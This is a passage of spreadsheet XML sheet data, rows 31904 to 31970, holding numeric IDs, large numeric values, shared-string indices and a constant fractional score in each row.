    <row r="31904" ht="15.75" customHeight="1">
      <c r="A31904" s="1">
        <v>7383.0</v>
      </c>
      <c r="B31904" s="2">
        <v>5.1081645E7</v>
      </c>
      <c r="C31904" s="2" t="s">
        <v>30690</v>
      </c>
      <c r="D31904" s="2">
        <v>1.0</v>
      </c>
      <c r="E31904" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31904" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31905" ht="15.75" customHeight="1">
      <c r="A31905" s="1">
        <v>7992.0</v>
      </c>
      <c r="B31905" s="2">
        <v>5.2755182E7</v>
      </c>
      <c r="C31905" s="2" t="s">
        <v>30691</v>
      </c>
      <c r="D31905" s="2">
        <v>1.0</v>
      </c>
      <c r="E31905" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31905" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31906" ht="15.75" customHeight="1">
      <c r="A31906" s="1">
        <v>8109.0</v>
      </c>
      <c r="B31906" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C31906" s="2" t="s">
        <v>30692</v>
      </c>
      <c r="D31906" s="2">
        <v>1.0</v>
      </c>
      <c r="E31906" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31906" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31907" ht="15.75" customHeight="1">
      <c r="A31907" s="1">
        <v>8474.0</v>
      </c>
      <c r="B31907" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C31907" s="2" t="s">
        <v>30693</v>
      </c>
      <c r="D31907" s="2">
        <v>1.0</v>
      </c>
      <c r="E31907" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31907" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31908" ht="15.75" customHeight="1">
      <c r="A31908" s="1">
        <v>8547.0</v>
      </c>
      <c r="B31908" s="2">
        <v>5.4141314E7</v>
      </c>
      <c r="C31908" s="2" t="s">
        <v>30694</v>
      </c>
      <c r="D31908" s="2">
        <v>1.0</v>
      </c>
      <c r="E31908" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31908" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31909" ht="15.75" customHeight="1">
      <c r="A31909" s="1">
        <v>8603.0</v>
      </c>
      <c r="B31909" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C31909" s="2" t="s">
        <v>30695</v>
      </c>
      <c r="D31909" s="2">
        <v>1.0</v>
      </c>
      <c r="E31909" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31909" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31910" ht="15.75" customHeight="1">
      <c r="A31910" s="1">
        <v>8714.0</v>
      </c>
      <c r="B31910" s="2">
        <v>5.4454499E7</v>
      </c>
      <c r="C31910" s="2" t="s">
        <v>30696</v>
      </c>
      <c r="D31910" s="2">
        <v>1.0</v>
      </c>
      <c r="E31910" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31910" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31911" ht="15.75" customHeight="1">
      <c r="A31911" s="1">
        <v>8729.0</v>
      </c>
      <c r="B31911" s="2">
        <v>5.4519206E7</v>
      </c>
      <c r="C31911" s="2" t="s">
        <v>30697</v>
      </c>
      <c r="D31911" s="2">
        <v>1.0</v>
      </c>
      <c r="E31911" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31911" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31912" ht="15.75" customHeight="1">
      <c r="A31912" s="1">
        <v>8815.0</v>
      </c>
      <c r="B31912" s="2">
        <v>5.4632077E7</v>
      </c>
      <c r="C31912" s="2" t="s">
        <v>30698</v>
      </c>
      <c r="D31912" s="2">
        <v>1.0</v>
      </c>
      <c r="E31912" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31912" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31913" ht="15.75" customHeight="1">
      <c r="A31913" s="1">
        <v>8820.0</v>
      </c>
      <c r="B31913" s="2">
        <v>5.4634638E7</v>
      </c>
      <c r="C31913" s="2" t="s">
        <v>30699</v>
      </c>
      <c r="D31913" s="2">
        <v>1.0</v>
      </c>
      <c r="E31913" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31913" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31914" ht="15.75" customHeight="1">
      <c r="A31914" s="1">
        <v>8843.0</v>
      </c>
      <c r="B31914" s="2">
        <v>5.4718196E7</v>
      </c>
      <c r="C31914" s="2" t="s">
        <v>30700</v>
      </c>
      <c r="D31914" s="2">
        <v>1.0</v>
      </c>
      <c r="E31914" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31914" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31915" ht="15.75" customHeight="1">
      <c r="A31915" s="1">
        <v>9050.0</v>
      </c>
      <c r="B31915" s="2">
        <v>5.506327E7</v>
      </c>
      <c r="C31915" s="2" t="s">
        <v>30701</v>
      </c>
      <c r="D31915" s="2">
        <v>1.0</v>
      </c>
      <c r="E31915" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31915" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31916" ht="15.75" customHeight="1">
      <c r="A31916" s="1">
        <v>9369.0</v>
      </c>
      <c r="B31916" s="2">
        <v>5.5690088E7</v>
      </c>
      <c r="C31916" s="2" t="s">
        <v>30702</v>
      </c>
      <c r="D31916" s="2">
        <v>1.0</v>
      </c>
      <c r="E31916" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31916" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31917" ht="15.75" customHeight="1">
      <c r="A31917" s="1">
        <v>9505.0</v>
      </c>
      <c r="B31917" s="2">
        <v>5.5946876E7</v>
      </c>
      <c r="C31917" s="2" t="s">
        <v>30703</v>
      </c>
      <c r="D31917" s="2">
        <v>1.0</v>
      </c>
      <c r="E31917" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31917" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31918" ht="15.75" customHeight="1">
      <c r="A31918" s="1">
        <v>9745.0</v>
      </c>
      <c r="B31918" s="2">
        <v>5.6464963E7</v>
      </c>
      <c r="C31918" s="2" t="s">
        <v>30704</v>
      </c>
      <c r="D31918" s="2">
        <v>1.0</v>
      </c>
      <c r="E31918" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31918" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31919" ht="15.75" customHeight="1">
      <c r="A31919" s="1">
        <v>9752.0</v>
      </c>
      <c r="B31919" s="2">
        <v>5.6490156E7</v>
      </c>
      <c r="C31919" s="2" t="s">
        <v>30705</v>
      </c>
      <c r="D31919" s="2">
        <v>1.0</v>
      </c>
      <c r="E31919" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31919" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31920" ht="15.75" customHeight="1">
      <c r="A31920" s="1">
        <v>9944.0</v>
      </c>
      <c r="B31920" s="2">
        <v>5.6876695E7</v>
      </c>
      <c r="C31920" s="2" t="s">
        <v>30706</v>
      </c>
      <c r="D31920" s="2">
        <v>1.0</v>
      </c>
      <c r="E31920" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31920" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31921" ht="15.75" customHeight="1">
      <c r="A31921" s="1">
        <v>9945.0</v>
      </c>
      <c r="B31921" s="2">
        <v>5.6882471E7</v>
      </c>
      <c r="C31921" s="2" t="s">
        <v>30707</v>
      </c>
      <c r="D31921" s="2">
        <v>1.0</v>
      </c>
      <c r="E31921" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31921" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31922" ht="15.75" customHeight="1">
      <c r="A31922" s="1">
        <v>10218.0</v>
      </c>
      <c r="B31922" s="2">
        <v>5.745114E7</v>
      </c>
      <c r="C31922" s="2" t="s">
        <v>30708</v>
      </c>
      <c r="D31922" s="2">
        <v>1.0</v>
      </c>
      <c r="E31922" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31922" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31923" ht="15.75" customHeight="1">
      <c r="A31923" s="1">
        <v>11079.0</v>
      </c>
      <c r="B31923" s="2">
        <v>1.8419045E7</v>
      </c>
      <c r="C31923" s="2" t="s">
        <v>30709</v>
      </c>
      <c r="D31923" s="2">
        <v>1.0</v>
      </c>
      <c r="E31923" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31923" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31924" ht="15.75" customHeight="1">
      <c r="A31924" s="1">
        <v>11243.0</v>
      </c>
      <c r="B31924" s="2">
        <v>2.0419358E7</v>
      </c>
      <c r="C31924" s="2" t="s">
        <v>30710</v>
      </c>
      <c r="D31924" s="2">
        <v>1.0</v>
      </c>
      <c r="E31924" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31924" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31925" ht="15.75" customHeight="1">
      <c r="A31925" s="1">
        <v>11345.0</v>
      </c>
      <c r="B31925" s="2">
        <v>2.1219859E7</v>
      </c>
      <c r="C31925" s="2" t="s">
        <v>30711</v>
      </c>
      <c r="D31925" s="2">
        <v>1.0</v>
      </c>
      <c r="E31925" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31925" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31926" ht="15.75" customHeight="1">
      <c r="A31926" s="1">
        <v>11585.0</v>
      </c>
      <c r="B31926" s="2">
        <v>2.2872068E7</v>
      </c>
      <c r="C31926" s="2" t="s">
        <v>30712</v>
      </c>
      <c r="D31926" s="2">
        <v>1.0</v>
      </c>
      <c r="E31926" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31926" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31927" ht="15.75" customHeight="1">
      <c r="A31927" s="1">
        <v>11803.0</v>
      </c>
      <c r="B31927" s="2">
        <v>2.4419068E7</v>
      </c>
      <c r="C31927" s="2" t="s">
        <v>30713</v>
      </c>
      <c r="D31927" s="2">
        <v>1.0</v>
      </c>
      <c r="E31927" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31927" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31928" ht="15.75" customHeight="1">
      <c r="A31928" s="1">
        <v>11805.0</v>
      </c>
      <c r="B31928" s="2">
        <v>2.4419068E7</v>
      </c>
      <c r="C31928" s="2" t="s">
        <v>30714</v>
      </c>
      <c r="D31928" s="2">
        <v>1.0</v>
      </c>
      <c r="E31928" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31928" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31929" ht="15.75" customHeight="1">
      <c r="A31929" s="1">
        <v>11918.0</v>
      </c>
      <c r="B31929" s="2">
        <v>2.5273741E7</v>
      </c>
      <c r="C31929" s="2" t="s">
        <v>30715</v>
      </c>
      <c r="D31929" s="2">
        <v>1.0</v>
      </c>
      <c r="E31929" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31929" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31930" ht="15.75" customHeight="1">
      <c r="A31930" s="1">
        <v>12151.0</v>
      </c>
      <c r="B31930" s="2">
        <v>2.7277203E7</v>
      </c>
      <c r="C31930" s="2" t="s">
        <v>30716</v>
      </c>
      <c r="D31930" s="2">
        <v>1.0</v>
      </c>
      <c r="E31930" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31930" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31931" ht="15.75" customHeight="1">
      <c r="A31931" s="1">
        <v>12263.0</v>
      </c>
      <c r="B31931" s="2">
        <v>2.8019278E7</v>
      </c>
      <c r="C31931" s="2" t="s">
        <v>30717</v>
      </c>
      <c r="D31931" s="2">
        <v>1.0</v>
      </c>
      <c r="E31931" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31931" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31932" ht="15.75" customHeight="1">
      <c r="A31932" s="1">
        <v>12618.0</v>
      </c>
      <c r="B31932" s="2">
        <v>3.0217764E7</v>
      </c>
      <c r="C31932" s="2" t="s">
        <v>30718</v>
      </c>
      <c r="D31932" s="2">
        <v>1.0</v>
      </c>
      <c r="E31932" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31932" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31933" ht="15.75" customHeight="1">
      <c r="A31933" s="1">
        <v>12631.0</v>
      </c>
      <c r="B31933" s="2">
        <v>3.0263573E7</v>
      </c>
      <c r="C31933" s="2" t="s">
        <v>30719</v>
      </c>
      <c r="D31933" s="2">
        <v>1.0</v>
      </c>
      <c r="E31933" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31933" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31934" ht="15.75" customHeight="1">
      <c r="A31934" s="1">
        <v>12660.0</v>
      </c>
      <c r="B31934" s="2">
        <v>3.0520451E7</v>
      </c>
      <c r="C31934" s="2" t="s">
        <v>30720</v>
      </c>
      <c r="D31934" s="2">
        <v>1.0</v>
      </c>
      <c r="E31934" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31934" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31935" ht="15.75" customHeight="1">
      <c r="A31935" s="1">
        <v>12668.0</v>
      </c>
      <c r="B31935" s="2">
        <v>3.0578139E7</v>
      </c>
      <c r="C31935" s="2" t="s">
        <v>30721</v>
      </c>
      <c r="D31935" s="2">
        <v>1.0</v>
      </c>
      <c r="E31935" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31935" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31936" ht="15.75" customHeight="1">
      <c r="A31936" s="1">
        <v>12803.0</v>
      </c>
      <c r="B31936" s="2">
        <v>3.1460064E7</v>
      </c>
      <c r="C31936" s="2" t="s">
        <v>30722</v>
      </c>
      <c r="D31936" s="2">
        <v>1.0</v>
      </c>
      <c r="E31936" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31936" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31937" ht="15.75" customHeight="1">
      <c r="A31937" s="1">
        <v>12812.0</v>
      </c>
      <c r="B31937" s="2">
        <v>3.1577918E7</v>
      </c>
      <c r="C31937" s="2" t="s">
        <v>30723</v>
      </c>
      <c r="D31937" s="2">
        <v>1.0</v>
      </c>
      <c r="E31937" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31937" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31938" ht="15.75" customHeight="1">
      <c r="A31938" s="1">
        <v>12900.0</v>
      </c>
      <c r="B31938" s="2">
        <v>3.2074499E7</v>
      </c>
      <c r="C31938" s="2" t="s">
        <v>30724</v>
      </c>
      <c r="D31938" s="2">
        <v>1.0</v>
      </c>
      <c r="E31938" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31938" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31939" ht="15.75" customHeight="1">
      <c r="A31939" s="1">
        <v>12997.0</v>
      </c>
      <c r="B31939" s="2">
        <v>3.2796263E7</v>
      </c>
      <c r="C31939" s="2" t="s">
        <v>30725</v>
      </c>
      <c r="D31939" s="2">
        <v>1.0</v>
      </c>
      <c r="E31939" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31939" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31940" ht="15.75" customHeight="1">
      <c r="A31940" s="1">
        <v>13193.0</v>
      </c>
      <c r="B31940" s="2">
        <v>3.4097173E7</v>
      </c>
      <c r="C31940" s="2" t="s">
        <v>30726</v>
      </c>
      <c r="D31940" s="2">
        <v>1.0</v>
      </c>
      <c r="E31940" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31940" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31941" ht="15.75" customHeight="1">
      <c r="A31941" s="1">
        <v>13836.0</v>
      </c>
      <c r="B31941" s="2">
        <v>3.6777191E7</v>
      </c>
      <c r="C31941" s="2" t="s">
        <v>30727</v>
      </c>
      <c r="D31941" s="2">
        <v>1.0</v>
      </c>
      <c r="E31941" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31941" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31942" ht="15.75" customHeight="1">
      <c r="A31942" s="1">
        <v>14246.0</v>
      </c>
      <c r="B31942" s="2">
        <v>3.8359365E7</v>
      </c>
      <c r="C31942" s="2" t="s">
        <v>30728</v>
      </c>
      <c r="D31942" s="2">
        <v>1.0</v>
      </c>
      <c r="E31942" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31942" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31943" ht="15.75" customHeight="1">
      <c r="A31943" s="1">
        <v>14304.0</v>
      </c>
      <c r="B31943" s="2">
        <v>3.8602231E7</v>
      </c>
      <c r="C31943" s="2" t="s">
        <v>30729</v>
      </c>
      <c r="D31943" s="2">
        <v>1.0</v>
      </c>
      <c r="E31943" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31943" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31944" ht="15.75" customHeight="1">
      <c r="A31944" s="1">
        <v>14481.0</v>
      </c>
      <c r="B31944" s="2">
        <v>3.9545497E7</v>
      </c>
      <c r="C31944" s="2" t="s">
        <v>30730</v>
      </c>
      <c r="D31944" s="2">
        <v>1.0</v>
      </c>
      <c r="E31944" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31944" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31945" ht="15.75" customHeight="1">
      <c r="A31945" s="1">
        <v>16485.0</v>
      </c>
      <c r="B31945" s="2">
        <v>4.652834E7</v>
      </c>
      <c r="C31945" s="2" t="s">
        <v>30731</v>
      </c>
      <c r="D31945" s="2">
        <v>1.0</v>
      </c>
      <c r="E31945" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31945" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31946" ht="15.75" customHeight="1">
      <c r="A31946" s="1">
        <v>16526.0</v>
      </c>
      <c r="B31946" s="2">
        <v>4.6695775E7</v>
      </c>
      <c r="C31946" s="2" t="s">
        <v>30732</v>
      </c>
      <c r="D31946" s="2">
        <v>1.0</v>
      </c>
      <c r="E31946" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31946" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31947" ht="15.75" customHeight="1">
      <c r="A31947" s="1">
        <v>17630.0</v>
      </c>
      <c r="B31947" s="2">
        <v>5.038241E7</v>
      </c>
      <c r="C31947" s="2" t="s">
        <v>30733</v>
      </c>
      <c r="D31947" s="2">
        <v>1.0</v>
      </c>
      <c r="E31947" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31947" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31948" ht="15.75" customHeight="1">
      <c r="A31948" s="1">
        <v>17739.0</v>
      </c>
      <c r="B31948" s="2">
        <v>5.067815E7</v>
      </c>
      <c r="C31948" s="2" t="s">
        <v>30734</v>
      </c>
      <c r="D31948" s="2">
        <v>1.0</v>
      </c>
      <c r="E31948" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31948" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31949" ht="15.75" customHeight="1">
      <c r="A31949" s="1">
        <v>17957.0</v>
      </c>
      <c r="B31949" s="2">
        <v>5.1296488E7</v>
      </c>
      <c r="C31949" s="2" t="s">
        <v>30735</v>
      </c>
      <c r="D31949" s="2">
        <v>1.0</v>
      </c>
      <c r="E31949" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31949" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31950" ht="15.75" customHeight="1">
      <c r="A31950" s="1">
        <v>17998.0</v>
      </c>
      <c r="B31950" s="2">
        <v>5.1415398E7</v>
      </c>
      <c r="C31950" s="2" t="s">
        <v>30736</v>
      </c>
      <c r="D31950" s="2">
        <v>1.0</v>
      </c>
      <c r="E31950" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31950" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31951" ht="15.75" customHeight="1">
      <c r="A31951" s="1">
        <v>18571.0</v>
      </c>
      <c r="B31951" s="2">
        <v>5.3204612E7</v>
      </c>
      <c r="C31951" s="2" t="s">
        <v>30737</v>
      </c>
      <c r="D31951" s="2">
        <v>1.0</v>
      </c>
      <c r="E31951" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31951" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31952" ht="15.75" customHeight="1">
      <c r="A31952" s="1">
        <v>18901.0</v>
      </c>
      <c r="B31952" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C31952" s="2" t="s">
        <v>30738</v>
      </c>
      <c r="D31952" s="2">
        <v>1.0</v>
      </c>
      <c r="E31952" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31952" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31953" ht="15.75" customHeight="1">
      <c r="A31953" s="1">
        <v>18986.0</v>
      </c>
      <c r="B31953" s="2">
        <v>5.441386E7</v>
      </c>
      <c r="C31953" s="2" t="s">
        <v>30739</v>
      </c>
      <c r="D31953" s="2">
        <v>1.0</v>
      </c>
      <c r="E31953" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31953" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31954" ht="15.75" customHeight="1">
      <c r="A31954" s="1">
        <v>19161.0</v>
      </c>
      <c r="B31954" s="2">
        <v>5.4899246E7</v>
      </c>
      <c r="C31954" s="2" t="s">
        <v>30740</v>
      </c>
      <c r="D31954" s="2">
        <v>1.0</v>
      </c>
      <c r="E31954" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31954" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31955" ht="15.75" customHeight="1">
      <c r="A31955" s="1">
        <v>19334.0</v>
      </c>
      <c r="B31955" s="2">
        <v>5.5341131E7</v>
      </c>
      <c r="C31955" s="2" t="s">
        <v>30741</v>
      </c>
      <c r="D31955" s="2">
        <v>1.0</v>
      </c>
      <c r="E31955" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31955" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31956" ht="15.75" customHeight="1">
      <c r="A31956" s="1">
        <v>19426.0</v>
      </c>
      <c r="B31956" s="2">
        <v>5.5666562E7</v>
      </c>
      <c r="C31956" s="2" t="s">
        <v>30742</v>
      </c>
      <c r="D31956" s="2">
        <v>1.0</v>
      </c>
      <c r="E31956" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31956" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31957" ht="15.75" customHeight="1">
      <c r="A31957" s="1">
        <v>19456.0</v>
      </c>
      <c r="B31957" s="2">
        <v>5.574729E7</v>
      </c>
      <c r="C31957" s="2" t="s">
        <v>30743</v>
      </c>
      <c r="D31957" s="2">
        <v>1.0</v>
      </c>
      <c r="E31957" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31957" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31958" ht="15.75" customHeight="1">
      <c r="A31958" s="1">
        <v>19593.0</v>
      </c>
      <c r="B31958" s="2">
        <v>5.6164463E7</v>
      </c>
      <c r="C31958" s="2" t="s">
        <v>30744</v>
      </c>
      <c r="D31958" s="2">
        <v>1.0</v>
      </c>
      <c r="E31958" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31958" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31959" ht="15.75" customHeight="1">
      <c r="A31959" s="1">
        <v>19624.0</v>
      </c>
      <c r="B31959" s="2">
        <v>5.6260589E7</v>
      </c>
      <c r="C31959" s="2" t="s">
        <v>30745</v>
      </c>
      <c r="D31959" s="2">
        <v>1.0</v>
      </c>
      <c r="E31959" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31959" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31960" ht="15.75" customHeight="1">
      <c r="A31960" s="1">
        <v>19697.0</v>
      </c>
      <c r="B31960" s="2">
        <v>5.6487917E7</v>
      </c>
      <c r="C31960" s="2" t="s">
        <v>30746</v>
      </c>
      <c r="D31960" s="2">
        <v>1.0</v>
      </c>
      <c r="E31960" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31960" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31961" ht="15.75" customHeight="1">
      <c r="A31961" s="1">
        <v>20096.0</v>
      </c>
      <c r="B31961" s="2">
        <v>9650680.0</v>
      </c>
      <c r="C31961" s="2" t="s">
        <v>30747</v>
      </c>
      <c r="D31961" s="2">
        <v>1.0</v>
      </c>
      <c r="E31961" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31961" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31962" ht="15.75" customHeight="1">
      <c r="A31962" s="1">
        <v>20822.0</v>
      </c>
      <c r="B31962" s="2">
        <v>1.5403677E7</v>
      </c>
      <c r="C31962" s="2" t="s">
        <v>30748</v>
      </c>
      <c r="D31962" s="2">
        <v>1.0</v>
      </c>
      <c r="E31962" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31962" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31963" ht="15.75" customHeight="1">
      <c r="A31963" s="1">
        <v>21488.0</v>
      </c>
      <c r="B31963" s="2">
        <v>2.3054491E7</v>
      </c>
      <c r="C31963" s="2" t="s">
        <v>30749</v>
      </c>
      <c r="D31963" s="2">
        <v>1.0</v>
      </c>
      <c r="E31963" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31963" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31964" ht="15.75" customHeight="1">
      <c r="A31964" s="1">
        <v>21788.0</v>
      </c>
      <c r="B31964" s="2">
        <v>2.6606108E7</v>
      </c>
      <c r="C31964" s="2" t="s">
        <v>30750</v>
      </c>
      <c r="D31964" s="2">
        <v>1.0</v>
      </c>
      <c r="E31964" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31964" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31965" ht="15.75" customHeight="1">
      <c r="A31965" s="1">
        <v>22580.0</v>
      </c>
      <c r="B31965" s="2">
        <v>3.880892E7</v>
      </c>
      <c r="C31965" s="2" t="s">
        <v>30751</v>
      </c>
      <c r="D31965" s="2">
        <v>1.0</v>
      </c>
      <c r="E31965" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31965" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31966" ht="15.75" customHeight="1">
      <c r="A31966" s="1">
        <v>22661.0</v>
      </c>
      <c r="B31966" s="2">
        <v>4.1239506E7</v>
      </c>
      <c r="C31966" s="2" t="s">
        <v>30752</v>
      </c>
      <c r="D31966" s="2">
        <v>1.0</v>
      </c>
      <c r="E31966" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31966" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31967" ht="15.75" customHeight="1">
      <c r="A31967" s="1">
        <v>23628.0</v>
      </c>
      <c r="B31967" s="2">
        <v>6550676.0</v>
      </c>
      <c r="C31967" s="2" t="s">
        <v>30753</v>
      </c>
      <c r="D31967" s="2">
        <v>1.0</v>
      </c>
      <c r="E31967" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31967" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31968" ht="15.75" customHeight="1">
      <c r="A31968" s="1">
        <v>23799.0</v>
      </c>
      <c r="B31968" s="2">
        <v>7775523.0</v>
      </c>
      <c r="C31968" s="2" t="s">
        <v>30754</v>
      </c>
      <c r="D31968" s="2">
        <v>1.0</v>
      </c>
      <c r="E31968" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31968" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31969" ht="15.75" customHeight="1">
      <c r="A31969" s="1">
        <v>24101.0</v>
      </c>
      <c r="B31969" s="2">
        <v>9847979.0</v>
      </c>
      <c r="C31969" s="2" t="s">
        <v>30755</v>
      </c>
      <c r="D31969" s="2">
        <v>1.0</v>
      </c>
      <c r="E31969" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31969" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31970" ht="15.75" customHeight="1">
      <c r="A31970" s="1">
        <v>24399.0</v>
      </c>
      <c r="B31970" s="2">
        <v>1.0801508E7</v>
      </c>
      <c r="C31970" s="2" t="s">
        <v>30756</v>
      </c>
      <c r="D31970" s="2">
        <v>1.0</v>
      </c>
      <c r="E31970" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31970" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
